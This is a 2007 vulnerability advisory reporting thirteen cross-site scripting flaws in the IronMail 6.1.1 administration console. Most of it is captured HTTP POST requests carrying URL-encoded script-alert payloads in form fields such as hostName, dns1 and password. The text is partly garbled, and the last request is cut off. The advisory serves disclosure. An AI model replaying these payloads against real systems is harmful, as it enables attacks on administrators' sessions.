Multiple XSS in IronMail

2007.03.30
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Founded multiple XSS in IronMail. See attached advisory. Spanish version in http://www.514.es. Regards, - J =============================== - Advisory - =============================== Ttulo: Multipls XSS in Cypherstrust Ironmail 6.1.1 Risk: Medium Date: 20.Feb.2007 Author: Javier Olascoaga <jolascoaga *at* 514.es> WEB: http://www.514.es/ .: [ INTRO ] :. IronMail protects enterprise email systems from inbound threats: spam, viruses; or hackers trying to take down or take over the e-mail system. IronMail protects enterprise email systems from outbound threats: regulatory compliance violations , corporate policy violations, or theft ("leakage") of confidential information or intellectual property. IronMail protects enterprise email systems from threats that haven't even been identified yet. .: [ TECHNICAL DESCRIPTION ] :. During the development of the technical tests against the IronMail mail system have been detected several Cross Site Scripting vulnerabilities in the administration console of the product. Next you can find the XSS founded: .: [ XSS #1 ] :. POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1 Referer: https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled =1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 295 Cache-Control: no-cache Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmet hod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11; /admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=; JSESSIONID=B227892A258E91419C09469E49AED4D4 'rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows %5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network= %27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0& defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submi t=Submit .: [ XSS #2 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenu Toggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 343 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm ethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Wmtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E &domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defau ltRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.ni st.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&et hernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:11:46 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #3 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 341 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm ethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Umtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%2 7%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&default Router=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist .gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethe rnetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:26 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #4 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 337 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm ethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscrip t%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaul tRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&#240; ernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:31 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #5 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 337 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm ethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Qmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet Mask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%2 9%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&#240; ernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:36 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #6 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 338 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm ethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Rmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet Mask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert %28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nis t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&#240; ernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:41 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #7 ] :. POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 340 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fm ethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Tmtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNet Mask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3C script%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nis t.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&#240; ernetSetting=autoselect&submit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:12:48 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #8 ] :. POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenu Toggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 154 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fm ethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29 %3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&#138;&#130; mit=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:13:16 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #9 ] :. POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled= 1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 146 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmeth od%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPa ssword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Subm it HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:13:41 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #10 ] :. POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenu Toggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 75 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.d o%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E Klicense=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Su bmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:20:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #11 ] :. POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenu Toggled=1&procId=90 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 1225 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=15; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.d o%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&row s%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValue Bean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelVal ueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C 30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows %5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValu eStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5 B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValida te=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDep ends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5 D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrVal ueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D. attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5 B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends= &rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.att rValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr= %27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submi t HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:21:27 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #12 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= init&procId=164 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2840 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP roperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B 0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows %5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable= true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows %5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript% 3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5 B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&r ows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyab le=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&r ows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B 2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&r ows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyab le=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&row s%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attr Type=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5 D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&r ows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D .attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attr Type=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=% 5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4% 5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId =2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_in tvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B 5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.m ultipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone =5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D. attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidat e=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1% 5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+ 3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5% 5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMAT ION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2 C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A 6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&ro ws%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.la ngTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_ aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.at trValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows %5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.lang TagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:22:51 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #13 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2840 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP roperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B 0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows %5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable= true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows %5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1 %5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0 &rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5 D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28% 27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B 2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&r ows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyab le=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&row s%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attr Type=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5 D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&r ows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D .attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attr Type=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=% 5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4% 5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId =2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_in tvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B 5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.m ultipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone =5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D. attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidat e=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1% 5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+ 3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5% 5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMAT ION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2 C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A 6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&ro 